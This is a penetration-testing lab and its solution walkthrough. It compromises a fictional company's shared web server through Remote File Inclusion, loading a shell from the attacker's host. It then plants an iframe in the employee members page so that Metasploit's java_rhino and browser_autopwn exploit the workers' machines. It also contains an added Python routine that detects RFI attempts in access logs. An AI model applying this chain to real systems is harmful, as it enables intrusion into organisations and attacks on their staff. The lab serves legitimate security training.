Lab 06.0 - Blind Penetration Test
LAB ID: 6
1. LAB
You are a penetration tester and you have been asked to perform a penetration
test against Foocompany. The organization relies on Foohosting Inc. to
host a dedicated web server on which several organizations' websites
are present. Your goal is to obtain access to the internal target
organization network, meaning you have to exploit one or more internal
machines. You know that the organization website offers a members
area that is browsed daily by the employees of the organization to
perform different tasks.
2. GOALS
Obtain access to one or more machines of the organization network
4. RECOMMENDED TOOLS
Metasploit
Further information:
o 10.100.0.100 foocompany.com
o 10.100.0.100 members.foocompany.com
--------------------------------------------------------------------------------------------------
The lab solutions follow. Be sure to read them only when
you have finished your lab, or if you are stuck.
Solutions
The following is a screenshot of our /etc/hosts file, with the two entries
that will allow us to connect to the organization website:
By adding the previous two lines, we are now able to browse the
organization website:
Indeed if we try to open the following address, we are able to read the
announcement.txt file:
As you can see, the page (foocompany.com) has been included. This
means that the server is vulnerable to RFI (Remote File Inclusion): the
include path is taken from the request and is not restricted to local files.
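From the defender's side, an RFI attempt of the kind shown above leaves a clear trace in the web server access log: a query parameter whose value is a remote URL or a PHP stream wrapper. The following detection routine is an added example, not part of the lab material; the log lines, client IPs and the `page` parameter name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Apache combined format). The IPs, paths
# and parameter names are assumptions for this example, not values from the lab.
SAMPLE_LOG = """\
192.168.78.5 - - [12/Apr/2012:11:04:48 +0200] "GET /index.php?page=news HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.100.0.77 - - [12/Apr/2012:11:05:02 +0200] "GET /index.php?page=http://10.100.0.77/shell.txt HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.100.0.77 - - [12/Apr/2012:11:05:09 +0200] "GET /index.php?page=https%3A%2F%2F10.100.0.77%2Fshell.txt HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.78.25 - - [12/Apr/2012:11:06:30 +0200] "GET /members/index.php?page=profile&id=42 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Pull the client IP, method and request target out of a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# A parameter value naming a remote resource (or a PHP stream wrapper) is what an
# RFI attempt against an unguarded include() looks like from the log's point of view.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://|^(?:php|data|expect)://', re.IGNORECASE)


def find_rfi_attempts(log_text):
    """Return (client_ip, param, value) for every request whose query string
    carries a remote URL or stream wrapper as a parameter value."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed combined-format line; skip it
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes values, so an encoded "https%3A%2F%2F..." is caught too.
        for param, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value.strip()):
                hits.append((m.group("ip"), param, value))
    return hits


if __name__ == "__main__":
    for ip, param, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"possible RFI attempt from {ip}: {param}={value}")
```

The same rule, run as an alert on live logs, also catches the local-file variant only if you extend `REMOTE_RE` with path patterns; the corresponding fix on the server is to resolve `page` against a fixed allowlist of local templates instead of passing it to `include()`.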
1) METASPLOIT
Metasploit offers a specific module that allows you to exploit RFI, called
‘php_include’. We need to set the server address, the URL vulnerable to
RFI and the payload to use.
[Screenshot: php_include module options set and the resulting meterpreter session]
2) SHELL
An easier way to exploit the server is by using shells.
Note: Lab machines are not connected to internet. We have to provide the shell.
We can create our shell and then store it in the folder ‘/var/www’. Now
we have to start the Apache service. We can do it by clicking apache start
in Application->Backtrack->Services->HTTPD:
[Screenshot: shell file stored in /var/www and the Apache service started]
Now we have to change the value in the URI in order to make the server
include and load our shell (http://OUR_IP_ADDRESS/shell.txt):
Now that we have taken control of the server, we can start searching for useful
information that can help us reach our goal. Since this is the only
connection between us and the organization network (the members area is
browsed by organization employees), we have to think about how we
can use the server to gain access to the organization machines.
By searching the web server folders, we can find a file named ‘logs.txt’
that could reveal useful information. Indeed, opening it, we can see a
history of clients that have connected to the members area, along with some
other information.
In the logs.txt file there are several warnings that tell us about clients'
login attempts, their browser user agent and their Java version. As you can see,
there are at least two clients (192.168.78.25 and 192.168.78.5) with an
out-of-date Java installation.
By searching for Java vulnerabilities, we can see that the two Java versions
are both vulnerable to the Java Rhino exploit.
Once again, we know that organization employees usually log into the
members area. What we can do, then, is edit the members webpage in
order to insert one or more iframes that point to our attacker
machine and try to exploit the clients' vulnerabilities this way.
There are different metasploit modules that we can use to achieve this
goal.
“auxiliary/server/browser_autopwn” and
“exploit/multi/browser/java_rhino”
The first one will use different browser exploits, while the second is more
specific for our environment, since the clients found in the ‘logs.txt’ file
are both vulnerable to this exploit. The reason why we also use the first
one, is that we don’t know if there are other workstations vulnerable to
different exploits. We want to maximize our chances of entering the
corporate network through a client side exploit.
1) BROWSER_AUTOPWN
[Screenshot: browser_autopwn module options set and the server started; the console reports the setup as done]
2) JAVA_RHINO
In the same way as browser_autopwn, we have to set up the java_rhino
module. Note that there are two different machines vulnerable to this
exploit, and they have different operating systems, so we have to set the module
accordingly (indeed we will leave the TARGET option at 0 - Generic).
Now we have another URL that we can use to exploit the target
organization corporate network.
To do so, we will use our shell or our Metasploit session (download,
edit and then upload the file back).
In this case we will use only the java_rhino exploit, so we add the
following code to the index.php:
[Screenshot: iframe added to index.php]
Once the page has been saved, we just have to wait for one of the
vulnerable clients to visit the members page. Indeed, after a few minutes
the first session has been created (IP: 192.168.78.5):
And right after the previous machine, another one has been exploited
(IP: 192.168.78.25).